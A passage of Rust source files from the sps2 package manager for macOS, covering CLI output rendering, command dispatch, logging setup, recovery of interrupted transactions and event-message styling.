println!(" ↓ {} {} → {}", change.package, old_version, new_version);
}
}
}
}
Ok(())
}
/// Render state history
fn render_state_history(&self, history: &[StateInfo]) -> io::Result<()> {
if history.is_empty() {
println!("No state history found.");
return Ok(());
}
let mut table = Table::new();
table
.load_preset(UTF8_FULL)
.set_content_arrangement(ContentArrangement::Dynamic);
table.set_header(vec![
Cell::new("State ID").add_attribute(Attribute::Bold),
Cell::new("Current").add_attribute(Attribute::Bold),
Cell::new("Operation").add_attribute(Attribute::Bold),
Cell::new("Created").add_attribute(Attribute::Bold),
Cell::new("Packages").add_attribute(Attribute::Bold),
]);
for state in history {
let current_cell = if state.current {
Cell::new("*")
.fg(Color::Green)
.add_attribute(Attribute::Bold)
} else {
Cell::new("")
};
table.add_row(vec![
Cell::new(state.id.to_string()),
current_cell,
Cell::new(&state.operation),
Cell::new(state.timestamp.format("%Y-%m-%d %H:%M").to_string()),
Cell::new(state.package_count.to_string()),
]);
}
println!("{table}");
Ok(())
}
    /// Render health check results
    ///
    /// Prints an overall pass/fail banner, a per-component status table,
    /// and (when present) a list of issues with severity markers and
    /// optional remediation suggestions.
    fn render_health_check(&self, health: &HealthCheck) -> io::Result<()> {
        let overall_icon = if health.healthy { "[OK]" } else { "[ERROR]" };
        println!("{overall_icon} System Health Check");
        println!();
        // Component status table
        let mut table = Table::new();
        table
            .load_preset(UTF8_FULL)
            .set_content_arrangement(ContentArrangement::Dynamic);
        table.set_header(vec![
            Cell::new("Component").add_attribute(Attribute::Bold),
            Cell::new("Status").add_attribute(Attribute::Bold),
            Cell::new("Duration").add_attribute(Attribute::Bold),
            Cell::new("Message").add_attribute(Attribute::Bold),
        ]);
        for component in health.components.values() {
            // Status color: green/yellow/red for healthy/warning/error.
            let status_cell = match component.status {
                HealthStatus::Healthy => Cell::new("Healthy").fg(Color::Green),
                HealthStatus::Warning => Cell::new("Warning").fg(Color::Yellow),
                HealthStatus::Error => Cell::new("Error").fg(Color::Red),
            };
            table.add_row(vec![
                Cell::new(&component.name),
                status_cell,
                Cell::new(format!("{}ms", component.check_duration_ms)),
                Cell::new(&component.message),
            ]);
        }
        println!("{table}");
        // Issues
        if !health.issues.is_empty() {
            println!();
            println!("Issues Found:");
            for issue in &health.issues {
                let severity_icon = match issue.severity {
                    IssueSeverity::Low => "[INFO]",
                    IssueSeverity::Medium => "[WARN]",
                    IssueSeverity::High => "[HIGH]",
                    IssueSeverity::Critical => "[CRITICAL]",
                };
                println!(
                    "{severity_icon} {} ({}): {}",
                    issue.component,
                    format!("{:?}", issue.severity).to_lowercase(),
                    issue.description
                );
                if let Some(suggestion) = &issue.suggestion {
                    println!(" {suggestion}");
                }
                println!();
            }
        }
        Ok(())
    }
    /// Render success message
    ///
    /// Plain pass-through: the message is printed verbatim on stdout.
    fn render_success_message(&self, message: &str) -> io::Result<()> {
        println!("{message}");
        Ok(())
    }
/// Render operation report
fn render_op_report(&self, report: &sps2_ops::OpReport) -> io::Result<()> {
let icon = if report.success { "[OK]" } else { "[ERROR]" };
println!("{icon} {} Report", report.operation);
println!();
println!("Summary: {}", report.summary);
println!("Duration: {}ms", report.duration_ms);
if !report.changes.is_empty() {
println!();
println!("Changes:");
for change in &report.changes {
match change.change_type {
sps2_ops::ChangeType::Install => {
let version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" + {} {}", change.package, version);
}
sps2_ops::ChangeType::Update => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" ~ {} {} → {}", change.package, old_version, new_version);
}
sps2_ops::ChangeType::Remove => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" - {} {}", change.package, old_version);
}
sps2_ops::ChangeType::Downgrade => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" ↓ {} {} → {}", change.package, old_version, new_version);
}
}
}
}
Ok(())
}
/// Format package status as colored cell
fn format_package_status(&self, status: &PackageStatus) -> Cell {
match status {
PackageStatus::Installed => Cell::new("Installed").fg(Color::Green),
PackageStatus::Outdated => Cell::new("Outdated").fg(Color::Yellow),
PackageStatus::Available => Cell::new("Available").fg(Color::Blue),
PackageStatus::Local => Cell::new("Local").fg(Color::Magenta),
}
}
/// Format package status as text
fn format_package_status_text(&self, status: &PackageStatus) -> String {
match status {
PackageStatus::Installed => "Installed".to_string(),
PackageStatus::Outdated => "Update available".to_string(),
PackageStatus::Available => "Available".to_string(),
PackageStatus::Local => "Local".to_string(),
}
}
/// Style package name
fn style_package_name(&self, name: &str) -> String {
if self.supports_color() {
Style::new().bold().apply_to(name).to_string()
} else {
name.to_string()
}
}
    /// Check if color output is supported
    ///
    /// `Always`/`Never` are absolute overrides; `Auto` defers to the
    /// terminal's own capability report.
    fn supports_color(&self) -> bool {
        match self.color_choice {
            ColorChoice::Always => true,
            ColorChoice::Never => false,
            ColorChoice::Auto => self.term.features().colors_supported(),
        }
    }
}
/// Format byte size in human readable format
///
/// Scales by powers of 1024 through B..TB. Byte counts are shown as whole
/// numbers; every larger unit gets one decimal place.
fn format_size(bytes: u64) -> String {
    const UNITS: &[&str] = &["B", "KB", "MB", "GB", "TB"];
    let mut value = bytes as f64;
    let mut unit = 0;
    // Stop at TB even for astronomically large inputs.
    while value >= 1024.0 && unit + 1 < UNITS.len() {
        value /= 1024.0;
        unit += 1;
    }
    match unit {
        0 => format!("{value:.0} {}", UNITS[unit]),
        _ => format!("{value:.1} {}", UNITS[unit]),
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/main.rs | apps/sps2/src/main.rs | #![warn(mismatched_lifetime_syntaxes)]
//! sps2 - Modern package manager for macOS ARM64
//!
//! This is the main CLI application that orchestrates all package management
//! operations through the ops crate.
mod cli;
mod display;
mod error;
mod events;
mod logging;
mod setup;
use crate::cli::{Cli, Commands, KeysCommands};
use crate::display::OutputRenderer;
use crate::error::CliError;
use crate::events::EventHandler;
use crate::setup::SystemSetup;
use clap::Parser;
use sps2_config::{fixed_paths, Config};
use sps2_events::{EventReceiver, EventSender};
use sps2_ops::{OperationResult, OpsContextBuilder};
use sps2_state::StateManager;
use sps2_types::state::TransactionPhase;
use std::process;
use tokio::select;
use tracing::{error, info, warn};
#[tokio::main]
async fn main() {
    // Parse CLI first so the JSON flag can shape logging and error output.
    let cli = Cli::parse();
    let json_mode = cli.global.json;
    // Initialize tracing with JSON awareness
    init_tracing(json_mode, cli.global.debug);
    // Any failure is logged; a human-readable error also goes to stderr
    // unless we are in JSON mode (stdout must stay machine-parseable).
    let Err(e) = run(cli).await else {
        return;
    };
    error!("Application error: {}", e);
    if !json_mode {
        eprintln!("Error: {e}");
    }
    process::exit(1);
}
/// Main application logic
///
/// Order matters here: config precedence is resolved first, then system
/// setup, then crash recovery — all before the event channel and ops
/// context exist — so recovery cannot race a new operation.
async fn run(cli: Cli) -> Result<(), CliError> {
    info!("Starting sps2 v{}", env!("CARGO_PKG_VERSION"));
    // Load configuration with proper precedence:
    // 1. Start with file config (or defaults)
    let mut config =
        Config::load_or_default_with_builder(&cli.global.config, &cli.global.builder_config)
            .await?;
    // 2. Merge environment variables
    config.merge_env()?;
    // 3. Apply CLI flags (highest precedence)
    apply_cli_config(&mut config, &cli.global, &cli.command)?;
    // Initialize system setup
    let mut setup = SystemSetup::new(config.clone());
    // Perform startup checks and initialization
    setup.initialize().await?;
    // --- RECOVERY LOGIC ---
    // Check for and complete any interrupted transactions
    if let Err(e) = recover_if_needed(setup.state()).await {
        error!("CRITICAL ERROR: A previous operation was interrupted and could not be automatically recovered: {}", e);
        if !cli.global.json {
            eprintln!("CRITICAL ERROR: A previous operation was interrupted and could not be automatically recovered: {e}");
            eprintln!("The package manager is in a potentially inconsistent state. Please report this issue.");
        }
        return Err(e);
    }
    // --- END RECOVERY LOGIC ---
    // Create event channel
    let (event_sender, event_receiver) = sps2_events::channel();
    // Build operations context
    let ops_ctx = build_ops_context(
        &setup,
        event_sender.clone(),
        config.clone(),
        cli.global.check,
    )
    .await?;
    // Create output renderer
    // CLI --color wins over the config-file default in both places below.
    let renderer = OutputRenderer::new(
        cli.global.json,
        cli.global.color.unwrap_or(config.general.color),
    );
    // Create event handler
    let colors_enabled = match cli.global.color.unwrap_or(config.general.color) {
        sps2_types::ColorChoice::Always => true,
        sps2_types::ColorChoice::Never => false,
        sps2_types::ColorChoice::Auto => console::Term::stdout().features().colors_supported(),
    };
    let mut event_handler = EventHandler::new(colors_enabled, cli.global.debug);
    // Execute command with event handling
    let result =
        execute_command_with_events(cli.command, ops_ctx, event_receiver, &mut event_handler)
            .await?;
    // Render final result
    renderer.render_result(&result)?;
    // Show PATH reminder if this was an install operation and PATH not set
    if matches!(result, OperationResult::InstallReport(_)) {
        show_path_reminder_if_needed();
    }
    info!("Command completed successfully");
    Ok(())
}
/// Execute command with concurrent event handling
///
/// Runs the command future while draining progress events from the
/// channel, so UI updates appear live rather than after completion.
async fn execute_command_with_events(
    command: Commands,
    ops_ctx: sps2_ops::OpsCtx,
    mut event_receiver: EventReceiver,
    event_handler: &mut EventHandler,
) -> Result<OperationResult, CliError> {
    // Pinned so it can be polled repeatedly across select! iterations.
    let mut command_future = Box::pin(execute_command(command, ops_ctx));
    loop {
        select! {
            // Command completed
            result = &mut command_future => {
                // Drain any events that arrived after the last poll.
                while let Ok(event) = event_receiver.try_recv() {
                    event_handler.handle_event(event);
                }
                return result;
            }
            // Event received
            event = event_receiver.recv() => {
                match event {
                    Some(event) => event_handler.handle_event(event),
                    // Channel closed: every sender is gone and the queue is
                    // drained, so recv() now resolves to None immediately on
                    // every poll. Staying in the select! would busy-spin this
                    // loop until the command finishes; instead, fall through
                    // to awaiting the command future directly.
                    None => return command_future.await,
                }
            }
        }
    }
}
/// Execute the specified command
///
/// Central dispatch: every CLI subcommand maps to one `sps2_ops` call,
/// and each result is wrapped in the matching `OperationResult` variant
/// for the renderer.
async fn execute_command(
    command: Commands,
    ctx: sps2_ops::OpsCtx,
) -> Result<OperationResult, CliError> {
    match command {
        // Small operations (implemented in ops crate)
        Commands::Reposync { yes } => {
            let result = sps2_ops::reposync(&ctx, yes).await?;
            Ok(OperationResult::Success(result))
        }
        Commands::Repo(repo_cmd) => match repo_cmd {
            cli::RepoCommands::Add { name, url } => {
                let result = sps2_ops::small_ops::add_repo(&ctx, &name, &url).await?;
                Ok(OperationResult::Success(result))
            }
            cli::RepoCommands::List => {
                let result = sps2_ops::small_ops::list_repos(&ctx).await?;
                Ok(OperationResult::Success(result))
            }
            cli::RepoCommands::Remove { name } => {
                let result = sps2_ops::small_ops::remove_repo(&ctx, &name).await?;
                Ok(OperationResult::Success(result))
            }
        },
        Commands::Keys(keys_cmd) => match keys_cmd {
            KeysCommands::List => {
                let result = sps2_ops::keys::keys_list(&ctx).await?;
                Ok(OperationResult::Success(result))
            }
            KeysCommands::Import { file, comment } => {
                let result = sps2_ops::keys::keys_import_from_file(&ctx, &file, comment).await?;
                Ok(OperationResult::Success(result))
            }
            KeysCommands::Remove { key_id } => {
                let result = sps2_ops::keys::keys_remove(&ctx, &key_id).await?;
                Ok(OperationResult::Success(result))
            }
        },
        Commands::List => {
            let packages = sps2_ops::list_packages(&ctx).await?;
            Ok(OperationResult::PackageList(packages))
        }
        Commands::Info { package } => {
            let info = sps2_ops::package_info(&ctx, &package).await?;
            Ok(OperationResult::PackageInfo(info))
        }
        Commands::Search { query } => {
            let results = sps2_ops::search_packages(&ctx, &query).await?;
            Ok(OperationResult::SearchResults(results))
        }
        Commands::Cleanup => {
            let result = sps2_ops::cleanup(&ctx).await?;
            // Also update the GC timestamp through SystemSetup (best effort)
            // — a failure here is only logged, not propagated.
            if let Err(e) = crate::setup::SystemSetup::update_gc_timestamp_static().await {
                tracing::warn!("Failed to update GC timestamp: {}", e);
            }
            Ok(OperationResult::Success(result))
        }
        Commands::Rollback { state_id } => {
            let state_info = sps2_ops::rollback(&ctx, state_id).await?;
            Ok(OperationResult::StateInfo(state_info))
        }
        Commands::History { all, verify, limit } => {
            let history = sps2_ops::history(&ctx, all, verify, limit).await?;
            Ok(OperationResult::StateHistory(history))
        }
        Commands::CheckHealth => {
            let health = sps2_ops::check_health(&ctx).await?;
            Ok(OperationResult::HealthCheck(health))
        }
        // Large operations (delegate to specialized crates)
        Commands::Install {
            packages,
            force_download,
        } => {
            let report = sps2_ops::install(&ctx, &packages, force_download).await?;
            Ok(OperationResult::InstallReport(report))
        }
        Commands::Update { packages } => {
            let report = sps2_ops::update(&ctx, &packages).await?;
            Ok(OperationResult::InstallReport(report))
        }
        Commands::Upgrade { packages } => {
            let report = sps2_ops::upgrade(&ctx, &packages).await?;
            Ok(OperationResult::InstallReport(report))
        }
        Commands::Uninstall { packages } => {
            let report = sps2_ops::uninstall(&ctx, &packages).await?;
            Ok(OperationResult::InstallReport(report))
        }
        Commands::Build {
            recipe,
            output_dir,
            network,
            jobs,
        } => {
            let output_path = output_dir.as_deref();
            let report = sps2_ops::build(&ctx, &recipe, output_path, network, jobs).await?;
            Ok(OperationResult::BuildReport(report))
        }
        Commands::Pack {
            recipe,
            directory,
            manifest,
            // SBOM field removed (soft-disabled)
            no_post,
            output_dir,
        } => {
            let output_path = output_dir.as_deref();
            let report = if let Some(dir) = directory {
                // The manifest is required with --directory, so we can unwrap it.
                let Some(manifest_path) = manifest else {
                    return Err(CliError::InvalidArguments(
                        "--manifest is required with --directory".to_string(),
                    ));
                };
                sps2_ops::pack_from_directory(&ctx, &dir, &manifest_path, output_path).await?
            } else if let Some(rec) = recipe {
                if no_post {
                    sps2_ops::pack_from_recipe_no_post(&ctx, &rec, output_path).await?
                } else {
                    sps2_ops::pack_from_recipe(&ctx, &rec, output_path).await?
                }
            } else {
                // This case should be prevented by clap's arg group
                return Err(CliError::InvalidArguments(
                    "Either --recipe or --directory must be specified".to_string(),
                ));
            };
            Ok(OperationResult::BuildReport(report))
        }
        Commands::SelfUpdate { skip_verify, force } => {
            let result = sps2_ops::self_update(&ctx, skip_verify, force).await?;
            Ok(OperationResult::Success(result))
        }
        Commands::Verify {
            heal,
            level,
            scope,
            sync_refcounts,
        } => {
            let result = sps2_ops::verify(&ctx, heal, &level, &scope, sync_refcounts).await?;
            Ok(OperationResult::VerificationResult(result))
        }
    }
}
/// Build operations context with all required components
///
/// Wires every subsystem handle from `SystemSetup` into the ops builder.
/// NOTE(review): the `.clone()` calls presumably copy cheap shared
/// handles rather than deep state — confirm against the setup types.
async fn build_ops_context(
    setup: &SystemSetup,
    event_sender: EventSender,
    config: Config,
    check_mode: bool,
) -> Result<sps2_ops::OpsCtx, CliError> {
    let ctx = OpsContextBuilder::new()
        .with_store(setup.store().clone())
        .with_state(setup.state().clone())
        .with_index(setup.index().clone())
        .with_net(setup.net().clone())
        .with_resolver(setup.resolver().clone())
        .with_builder(setup.builder())
        .with_event_sender(event_sender)
        .with_config(config)
        .with_check_mode(check_mode)
        .build()?;
    Ok(ctx)
}
/// Initialize the global tracing subscriber.
///
/// Behavior matrix:
/// - `json_mode` + debug: JSON-formatted logs go to a timestamped file under
///   `LOGS_DIR`; nothing is written to the console so stdout stays valid JSON.
/// - `json_mode` without debug (or when the log file cannot be created):
///   logging is routed to `io::sink`, i.e. fully disabled.
/// - debug (non-JSON): JSON logs to a timestamped file, with the file path
///   announced on stderr; falls back to stderr logging if file creation fails.
/// - normal: warn-level logging to stderr.
///
/// Must be called at most once per process: every branch ends in
/// `tracing_subscriber::fmt()...init()`, which sets the global default
/// subscriber.
fn init_tracing(json_mode: bool, debug_enabled_flag: bool) {
    // Check if debug logging is enabled: either the CLI flag was passed or
    // RUST_LOG is present in the environment (only presence is checked here;
    // the value is consumed later by EnvFilter::try_from_default_env).
    let debug_enabled = std::env::var("RUST_LOG").is_ok() || debug_enabled_flag;
    if json_mode {
        // JSON mode: suppress all console output to avoid contaminating JSON
        if debug_enabled {
            // In debug mode with JSON, still log to file
            let log_dir = std::path::Path::new(fixed_paths::LOGS_DIR);
            if std::fs::create_dir_all(log_dir).is_ok() {
                // One log file per invocation, named by UTC timestamp.
                let log_file = log_dir.join(format!(
                    "sps2-{}.log",
                    chrono::Utc::now().format("%Y%m%d-%H%M%S")
                ));
                if let Ok(file) = std::fs::File::create(&log_file) {
                    tracing_subscriber::fmt()
                        .json()
                        .with_writer(file)
                        .with_env_filter(
                            // RUST_LOG wins when set; otherwise default to
                            // debug-level output for the sps2 crate itself.
                            tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(
                                |_| {
                                    tracing_subscriber::EnvFilter::new(
                                        "info,sps2=debug,sps2_ops=info",
                                    )
                                },
                            ),
                        )
                        .init();
                    return;
                }
            }
        }
        // Fallback: disable all logging in JSON mode. This path is also taken
        // when the log directory/file could not be created above — failures
        // stay silent by design so JSON consumers see clean output.
        tracing_subscriber::fmt()
            .with_writer(std::io::sink)
            .with_env_filter("off")
            .init();
    } else if debug_enabled {
        // Debug mode: structured JSON logs to file
        let log_dir = std::path::Path::new(fixed_paths::LOGS_DIR);
        if let Err(e) = std::fs::create_dir_all(log_dir) {
            // Non-fatal: File::create below will fail and we fall back to stderr.
            eprintln!("Warning: Failed to create log directory: {e}");
        }
        let log_file = log_dir.join(format!(
            "sps2-{}.log",
            chrono::Utc::now().format("%Y%m%d-%H%M%S")
        ));
        match std::fs::File::create(&log_file) {
            Ok(file) => {
                tracing_subscriber::fmt()
                    .json()
                    .with_writer(file)
                    .with_env_filter(
                        tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(
                            |_| tracing_subscriber::EnvFilter::new("info,sps2=debug,sps2_ops=info"),
                        ),
                    )
                    .init();
                // Tell the user where the debug log landed (on stderr, so it
                // does not interfere with normal stdout output).
                eprintln!("Debug logging enabled: {}", log_file.display());
            }
            Err(e) => {
                eprintln!("Warning: Failed to create log file: {e}");
                // Fallback to stderr (note: info-level default here, not debug)
                tracing_subscriber::fmt()
                    .with_env_filter(
                        tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(
                            |_| tracing_subscriber::EnvFilter::new("info,sps2=info,sps2_ops=info"),
                        ),
                    )
                    .init();
            }
        }
    } else {
        // Normal mode: minimal logging to stderr
        tracing_subscriber::fmt()
            .with_env_filter(
                tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(|_| {
                    tracing_subscriber::EnvFilter::new("warn,sps2=warn,sps2_ops=warn")
                }),
            )
            .init();
    }
}
/// Warn on stderr when the sps2 bin directory is missing from `$PATH`.
///
/// Prints zsh-oriented shell instructions for adding it; does nothing when
/// the directory already appears in `PATH` (an unset `PATH` is treated as
/// empty, so the reminder is shown).
fn show_path_reminder_if_needed() {
    let current_path = std::env::var("PATH").unwrap_or_default();
    if current_path.contains(fixed_paths::BIN_DIR) {
        return;
    }
    eprintln!();
    eprintln!(
        "Add {} to your PATH to use installed packages:",
        fixed_paths::BIN_DIR
    );
    eprintln!(
        " echo 'export PATH=\"{}:$PATH\"' >> ~/.zshrc",
        fixed_paths::BIN_DIR
    );
    eprintln!(" source ~/.zshrc");
    eprintln!();
}
/// Apply CLI configuration overrides (highest precedence).
///
/// Global flags (currently `--color`) override the corresponding config
/// values; command-specific flags (currently only `build --jobs`) override
/// their builder settings.
///
/// # Errors
/// Currently infallible; returns `Result` so the signature matches the rest
/// of the configuration pipeline.
fn apply_cli_config(
    config: &mut Config,
    global: &cli::GlobalArgs,
    command: &cli::Commands,
) -> Result<(), CliError> {
    // Global CLI flags beat every other configuration source.
    if let Some(color) = global.color.as_ref() {
        config.general.color = *color;
    }
    // Command-specific CLI flags.
    match command {
        cli::Commands::Build {
            jobs: Some(job_count),
            ..
        } => config.builder.build.build_jobs = *job_count,
        _ => {}
    }
    Ok(())
}
/// Check for and complete an interrupted two-phase transaction.
///
/// Reads the transaction journal; if one exists, a previous operation died
/// between preparing the database and finalizing it, and the remaining steps
/// are replayed so the system converges to the intended new state:
///
/// - `Prepared`: the DB is prepared but the staging -> live filesystem rename
///   may or may not have happened. If the staging path still exists, perform
///   the rename plus DB finalize; otherwise assume the rename already
///   completed and only finalize the DB state and clear the journal.
/// - `Swapped`: the filesystem swap completed; only the DB finalize and
///   journal cleanup remain.
///
/// # Errors
/// Propagates journal-read, filesystem, and state-finalization errors.
async fn recover_if_needed(state_manager: &StateManager) -> Result<(), CliError> {
    if let Some(journal) = state_manager.read_journal().await? {
        warn!("Warning: A previous operation was interrupted. Attempting to recover...");
        match journal.phase {
            TransactionPhase::Prepared => {
                // The DB is prepared, filesystem step may or may not have completed.
                // New default behavior does an atomic rename of staging -> live.
                // If staging still exists, complete the rename; otherwise, assume it completed and just finalize DB.
                if sps2_platform::filesystem_helpers::exists(&journal.staging_path).await {
                    info!("Recovery: Completing filesystem finalize (rename + DB finalize)");
                    // NOTE(review): presumably this helper also clears the
                    // journal on success, mirroring the explicit clear_journal
                    // calls in the other branches — confirm in StateManager.
                    state_manager
                        .execute_filesystem_swap_and_finalize(journal)
                        .await?;
                } else {
                    info!("Recovery: Staging missing; assuming filesystem step completed. Finalizing DB state only.");
                    state_manager
                        .finalize_db_state(journal.new_state_id)
                        .await?;
                    state_manager.clear_journal().await?;
                }
            }
            TransactionPhase::Swapped => {
                // The FS swap happened, but the DB wasn't finalized.
                // We only need to finalize the DB state.
                info!("Recovery: Finalizing database state");
                state_manager
                    .finalize_db_state(journal.new_state_id)
                    .await?;
                state_manager.clear_journal().await?;
            }
        }
        warn!("Recovery successful.");
    }
    Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/events.rs | apps/sps2/src/events.rs | //! Event handling and progress display
use crate::logging::log_event_with_tracing;
use console::{style, Term};
use sps2_events::{
events::{LifecycleEvent, LifecycleStage, LifecycleUpdateOperation},
AppEvent, EventMessage, EventMeta, ProgressEvent,
};
use std::collections::HashMap;
use std::time::Duration;
/// Event severity levels for UI styling
///
/// Drives the prefix text and coloring chosen by [`UiStyle`]; `Debug`-level
/// output is intended to be shown only when debug mode is enabled.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum EventSeverity {
    /// Debug information (shown only with --debug)
    Debug,
    /// Normal informational messages
    Info,
    /// Success messages
    Success,
    /// Warning messages
    Warning,
    /// Error messages
    Error,
    /// Critical errors (styled like errors, with an underlined prefix)
    Critical,
}
/// UI styling configuration
///
/// Combines the caller's color preference with runtime terminal capability
/// detection; styled output is produced only when both allow it.
#[derive(Clone)]
pub struct UiStyle {
    /// Whether colors are enabled by the caller's preference
    colors_enabled: bool,
    /// Terminal instance for feature detection (color support)
    term: Term,
}
impl UiStyle {
pub fn new(colors_enabled: bool) -> Self {
Self {
colors_enabled,
term: Term::stdout(),
}
}
/// Get styled prefix for event severity
pub fn get_prefix(&self, severity: EventSeverity) -> String {
if !self.colors_enabled || !self.term.features().colors_supported() {
return match severity {
EventSeverity::Debug => "[DEBUG]".to_string(),
EventSeverity::Info => "[INFO]".to_string(),
EventSeverity::Success => "[OK]".to_string(),
EventSeverity::Warning => "[WARN]".to_string(),
EventSeverity::Error => "[ERROR]".to_string(),
EventSeverity::Critical => "[CRITICAL]".to_string(),
};
}
// Use clean text prefixes
match severity {
EventSeverity::Debug => {
format!("{}", style("[DEBUG]").dim().cyan())
}
EventSeverity::Info => {
format!("{}", style("[INFO]").blue())
}
EventSeverity::Success => {
format!("{}", style("[OK]").green().bold())
}
EventSeverity::Warning => {
format!("{}", style("[WARN]").yellow().bold())
}
EventSeverity::Error => {
format!("{}", style("[ERROR]").red().bold())
}
EventSeverity::Critical => {
format!("{}", style("[CRITICAL]").red().bold().underlined())
}
}
}
/// Style message text based on severity
pub fn style_message(&self, message: &str, severity: EventSeverity) -> String {
if !self.colors_enabled || !self.term.features().colors_supported() {
return message.to_string();
}
match severity {
EventSeverity::Debug => style(message).dim().to_string(),
EventSeverity::Info => message.to_string(),
EventSeverity::Success => style(message).green().bold().to_string(),
EventSeverity::Warning => style(message).yellow().to_string(),
EventSeverity::Error => style(message).red().bold().to_string(),
EventSeverity::Critical => style(message).red().bold().to_string(),
}
}
/// Style message text for operations (with bold styling for important operations)
pub fn style_operation_message(
&self,
message: &str,
operation: &str,
severity: EventSeverity,
) -> String {
if !self.colors_enabled || !self.term.features().colors_supported() {
return message.to_string();
}
// Apply bold styling for important operations
let should_bold = matches!(
operation,
"install" | "uninstall" | "build" | "upgrade" | "rollback" | "health" | "2pc"
);
match severity {
EventSeverity::Debug => style(message).dim().to_string(),
EventSeverity::Info => {
if should_bold {
style(message).bold().to_string()
} else {
message.to_string()
}
}
EventSeverity::Success => style(message).green().bold().to_string(),
EventSeverity::Warning => {
if should_bold {
style(message).yellow().bold().to_string()
} else {
style(message).yellow().to_string()
}
}
EventSeverity::Error => style(message).red().bold().to_string(),
EventSeverity::Critical => style(message).red().bold().to_string(),
}
}
}
/// Mutable bookkeeping for one in-flight progress tracker.
///
/// Stored in `EventHandler::progress_states`, keyed by a progress identifier.
/// (The code that updates these fields lies outside this view; field
/// semantics below are inferred from names — confirm against the progress
/// event handlers.)
#[derive(Debug, Clone)]
struct ProgressState {
    /// Human-readable operation label for this tracker.
    operation: String,
    /// Total units when known; `None` presumably means indeterminate progress.
    total: Option<u64>,
    /// Units completed so far.
    current: u64,
    /// Ordered phase names for multi-phase operations.
    phases: Vec<String>,
    /// Index into `phases` for the active phase, if any.
    current_phase: Option<usize>,
    /// Last whole-percent value reported — likely used to throttle output.
    last_percent_reported: Option<u8>,
    /// Progress value at the time of the last display update.
    last_displayed_progress: u64,
}
/// Event handler for user feedback
///
/// Receives [`EventMessage`]s, forwards them to the structured-logging layer,
/// and renders them to the console using the configured [`UiStyle`].
pub struct EventHandler {
    /// UI styling configuration
    ui_style: UiStyle,
    /// Whether debug mode is enabled (gates Debug-severity console output)
    debug_enabled: bool,
    /// Active progress trackers keyed by progress identifier
    progress_states: HashMap<String, ProgressState>,
}
impl EventHandler {
pub fn new(colors_enabled: bool, debug_enabled: bool) -> Self {
Self {
ui_style: UiStyle::new(colors_enabled),
debug_enabled,
progress_states: HashMap::new(),
}
}
fn show_operation_message(&mut self, message: &str, operation: &str, severity: EventSeverity) {
let prefix = self.ui_style.get_prefix(severity);
let styled = self
.ui_style
.style_operation_message(message, operation, severity);
println!("{prefix} {styled}");
}
fn show_message(&mut self, message: &str, severity: EventSeverity) {
let prefix = self.ui_style.get_prefix(severity);
let styled = self.ui_style.style_message(message, severity);
println!("{prefix} {styled}");
}
/// Handle incoming event
pub fn handle_event(&mut self, message: EventMessage) {
// Log event with structured logging
log_event_with_tracing(&message);
let EventMessage { meta, event } = message;
match event {
// Download events
AppEvent::Lifecycle(LifecycleEvent::Download {
stage,
context,
failure,
}) => match stage {
LifecycleStage::Started => {
self.handle_download_started(
&meta,
&context.url,
context.package.as_deref(),
context.total_bytes,
);
}
LifecycleStage::Completed => {
self.handle_download_completed(
&meta,
&context.url,
context.package.as_deref(),
context.bytes_downloaded.unwrap_or(0),
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
self.handle_download_failed(
&meta,
&context.url,
context.package.as_deref(),
&failure_ctx,
);
}
}
},
AppEvent::Lifecycle(LifecycleEvent::Acquisition {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleAcquisitionSource;
match stage {
LifecycleStage::Started => {
if let LifecycleAcquisitionSource::StoreCache { hash } = &context.source {
self.show_operation(
&meta,
format!(
"Reusing stored package {} {} (hash {})",
context.package, context.version, hash
),
"acquire",
EventSeverity::Info,
);
} else if self.debug_enabled {
self.show_meta_message(
&meta,
format!(
"Acquisition started for {} {}",
context.package, context.version
),
EventSeverity::Debug,
);
}
}
LifecycleStage::Completed => {
if let LifecycleAcquisitionSource::StoreCache { hash } = &context.source {
let size = context.size.unwrap_or(0);
self.show_operation(
&meta,
format!(
"Prepared stored package {} {} ({}, hash {})",
context.package,
context.version,
self.format_bytes(size),
hash
),
"acquire",
EventSeverity::Success,
);
} else if self.debug_enabled {
let size = context.size.unwrap_or(0);
self.show_meta_message(
&meta,
format!(
"Acquisition completed for {} {} ({} bytes)",
context.package, context.version, size
),
EventSeverity::Debug,
);
}
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
let message = match &context.source {
LifecycleAcquisitionSource::StoreCache { hash } => format!(
"Failed to prepare stored package {} {} (hash {}): {}",
context.package, context.version, hash, failure_ctx.message
),
LifecycleAcquisitionSource::Remote { .. } => format!(
"Acquisition failed for {} {}: {}",
context.package, context.version, failure_ctx.message
),
};
let severity = if failure_ctx.retryable {
EventSeverity::Warning
} else {
EventSeverity::Error
};
self.show_operation(&meta, message, "acquire", severity);
}
}
}
}
// Install events (replaces package events)
AppEvent::Lifecycle(LifecycleEvent::Install {
stage,
context,
failure,
}) => match stage {
LifecycleStage::Started => {
self.show_operation(
&meta,
format!("Installing {} {}", context.package, context.version),
"install",
EventSeverity::Info,
);
}
LifecycleStage::Completed => {
let files = context.files_installed.unwrap_or(0);
self.show_operation(
&meta,
format!(
"Installed {} {} ({} files)",
